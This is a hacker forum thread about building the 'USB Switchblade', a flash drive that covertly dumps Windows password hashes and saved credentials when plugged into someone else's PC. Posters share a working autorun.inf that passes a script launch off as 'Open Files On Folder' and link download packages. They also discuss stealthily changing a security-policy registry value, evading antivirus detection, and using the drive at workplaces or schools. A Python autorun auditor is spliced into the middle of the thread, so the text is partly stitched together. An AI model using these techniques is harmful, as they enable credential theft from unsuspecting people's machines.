
USB Switchblade Development


Darren Kitchen


Sadly, I gave up my chance to get a U3 flash drive for a wireless kb and mouse... Argh... why did I not see this first! :oops:

I'll be on the lookout for such packages. Does anyone have any idea roughly how large a flash drive you need for this?


Well, for the non-U3 version of this hack a 16 MB drive would be enough; all the files don't use more than 1 MB including the dumps. I didn't check out the U3 version (I don't have a U3 USB stick). But I'm 99% sure that 256 MB is more than enough for this type of hack.


Praise the lord! That means you could pull this non-U3 version of the hack off with your MP3 players :P I think using MP3 players would be fairly innocuous, as not many people would suspect you of plugging a USB MP3 player into their box =)

Imagine walking up to a box in your workplace (I wouldn't recommend it) or your school and plugging in an MP3 player. It would seem innocuous... but conceals a dastardly act.

^My imagination is running wild thinking of possible attack vectors :P


I don't think you can get around the "What do you want Windows to do" message, but I am using Amish's method and I have all of the features of the U3.

What I did was download them both and then create a hybrid of the two. The main thing that you have to modify is autorun.inf to point to go.cmd on the USB key, move nircmd.exe to the WIP\CMD directory, and copy the Icons directory from Amish's version to yours.

Here is my autorun.inf after modification:

[autorun]
action=Open Files On Folder
icon=WIP\icons\drive.ico
shellexecute=WIP\CMD\nircmd.exe execmd CALL WIP\CMD\go.cmd

It's simple and you get all of the U3 features :D


:( Unfortunately Amish's still seems to bug me with the "What do you want windows to do" message, and it doesn't copy the LM hashes either.

If anyone works out fixes for these for those of us without a spare U3 drive it would be great :)

Well that's the point of Amish's technique. Without U3 the autorun isn't going to happen*. However with Amish's technique by selecting the "Open Files On Folder" option you've actually chosen "Run Amish's scripts invisibly and then open the folder".

And sure it doesn't run pwdump yet but all you have to do is merge Amish's social engineering autorun with MaxDamage's invisible pwdumper and you'll be all set.

*nothing is impossible but AFAIK this is the way autorun works and I don't know of a workaround.

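A defender-side check for the trick described in the two posts above, where the AutoPlay entry is labelled like a folder-open action while its command runs a script. This is an added example, not code from the thread or from any tool mentioned in it; the function names, the label heuristic and both sample files are assumptions made for illustration.

```python
import re

LAUNCH_KEYS = {"open", "shellexecute"}
SHELL_VERB = re.compile(r"^shell\\[^\\]+\\command$")   # shell\<verb>\command keys
RUNNABLE = re.compile(r"\.(exe|com|scr|cmd|bat|vbs|js|ps1)\b", re.I)
# Heuristic (assumption): a label that reads like Explorer's own "open folder" choice.
FOLDER_LABEL = re.compile(r"\bopen\b.*\b(folder|files)\b", re.I)

# Constructed samples; the first is modelled on the autorun.inf quoted in the thread.
SAMPLE_SUSPICIOUS = r"""[autorun]
action=Open Files On Folder
icon=WIP\icons\drive.ico
shellexecute=WIP\CMD\nircmd.exe execmd CALL WIP\CMD\go.cmd
"""
SAMPLE_BENIGN = """[autorun]
icon=vendor.ico
label=Backup Drive
"""

def parse_autorun(text):
    """Return {key: value} for the [autorun] section, keys lower-cased."""
    entries, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):          # blank line or comment
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries

def audit_autorun(text):
    """List reasons an autorun.inf deserves a closer look (empty list = none)."""
    entries = parse_autorun(text)
    launches = {k: v for k, v in entries.items()
                if (k in LAUNCH_KEYS or SHELL_VERB.match(k)) and RUNNABLE.search(v)}
    findings = [f"{k} launches a program or script: {v}" for k, v in launches.items()]
    label = entries.get("action", "")
    if launches and FOLDER_LABEL.search(label):
        findings.append(f"action label '{label}' imitates a folder-open choice")
    return findings

if __name__ == "__main__":
    for name, sample in (("suspicious", SAMPLE_SUSPICIOUS), ("benign", SAMPLE_BENIGN)):
        print(name, audit_autorun(sample) or "no findings")
```
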

ahhhh stupid me :roll:

It all makes sense now - I must have just discarded the whole "social engineering" comment describing the download :wink:

Am playing with merging the two now...

btw. you seem to be getting a fair bit of attention in the blogosphere with this stuff ;)


I've been doing some research as to my local policy question. I'm trying to find the values in the registry, and I'm bugging a couple of my '1337' friends for some help. I think it could be done in VB using API scripts, but I'm not sure. Any feedback would be wicked.


jackpot :D

....well kinda

I found the registry value and stuff for local security policies that would normally make using fastpush impossible.

The location is:

"HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\SECEdit\Reg Values\Machine/System/CurrentControlSet/Control/LSa/Forceguest"

However, I'm a bit of a n00b and not sure how to go about editing it. Anyone know what the most effective and "stealthy" method of doing this would be?


Please remember this is not a rip-off of Amish that I'm trying to pass off as my own. The menu itself I made for my own personal use, but decided to share in case it might be useful to others... and this was not designed to collect passwords from multiple machines; it was done more as a toolbox that can be used at the time on the PC you currently have access to...

/ This is the menu system I've made and put on my USB pen. It was originally made for when I'm in college and I need to do stuff but would be blocked by a proxy or whatever. Hope it's of use to someone, and use the PCInfo to get all the stuff you would normally get..

Download Link

Hak5 Patch *this replaces Morgannwg with Hak5 ^^, hope you all like it*

Side note: the part to gather information is based around Amish with a few extras added to it; this was not intended for people who wanted to do things sneakily :)

Application list:

OpenOffice
AbiWord
Notepad++
VLC player
mIRC *NoNamesScript*
Gaim
Firefox
7-Zip
uTorrent
FTPWander
Speedy *download manager*
TSearch1.6
OllyDbg
ResEditor
TCPView
TCPTools *forgot other name for it*
PuTTY
VNC Viewer
FastPush
Cain
WinPcap Installer
DX-Ball *fun and addictive little game*
PCInfo, will run the package to gather passwords etc..

Total size: 350 MB uncompressed / 160 MB compressed


Ok so here is my little modification

For those of you that would like to help my rapidshare.

http://rapidshare.de/files/32353339/PCInfo.rar.html

But I know it's annoying and some people cannot download from rapidshare, so

http://www.fileden.com/files/2006/7/8/116430/PCInfo.rar

Any problems or feedback let me know. :-)

Why does cports.exe try to connect to 192.168.1.1??


I think I found a way around the admin problem..

From my understanding, psexec is a program that lets you run apps in the system account. For example, you can use it to see hidden parts of the registry. I'm not sure if it could be modified to work with the pwdump or w/e to run it in that method. The link is here: http://www.sysinternals.com/utilities/PSexec.html if you guys wanted to give it a shot. Let me know what you guys come up with; I can't really try anything right now, since I'm not at my computer.


Hmmm see if this makes a difference. Trash the old one.

http://rapidshare.de/files/32434912/NonU3.rar.html

or

http://www.fileden.com/files/2006/7/8/116430/NonU3.rar

Let me know if there's still a problem. But if you have a router I believe that might have something to do with it.


I am going to see if there is a way I could do it for a memory card, maybe an SD.

Also, I am going to see if I can find a buffer or maybe format exploit for autorun.inf or maybe the icon.

Maybe even a timed crash hack, so after 30 min. or so it will crash.


This is very interesting, however it is not really part of the 'switchblade' hack. However I highly encourage you to add it to the wiki at www.hak5.org/wiki/

In fact, seeing how there are multiple versions of this project floating around, we might want to move downloads and instructions to the wiki under a 'switchblade' page. However, development discussion should stay in this thread.

I'll be trying out the future developments and hopefully we can do a follow-up segment sometime soon. There are many great ideas floating around here. Mad props to all the interested hackers, and welcome to those that have stumbled upon Hak5 through the blogosphere.


Nope, still does it, prolly calling home? But it's to a DNS??


I have put MaxDamage's and Amish's solutions together. I'm calling it MAD for now =P. It doesn't require U3 and will steal both LM hashes and history messenger passwords etc. I also made it so that the file structure was a little neater. I also used another version of pwdump that seems to work better for me. If someone could scan and encrypt any exe's that show as "hacktools" that would be great.

http://kapowdude.googlepages.com/MAD1.zip

Installation:

Extract the files in MAD 1.zip to the root of your portable storage device.

When connected to a computer it will dump everything it receives to switchblade/dump/INSERTCOMPUTERNAMEHERE/

Enjoy

If you have any problems just drop me an email at kapowdude {at} gmail {dot} com

Edit: I'm gonna start the wiki

edit2: http://www.hak5.org/wiki/index.php?title=USB_Switchblade (help!!!)


You need to fix this, I think. It seems to dump the passwords; unfortunately the device becomes unavailable afterward. The orange light on my switchblade goes on for a sec then turns off.

/boots linux to see what the deuce went wrong

EDIT: Works fine in Windows now (randomly). However, it didn't dump anything of mine. I did however find the password of "adwtiger" :wink:
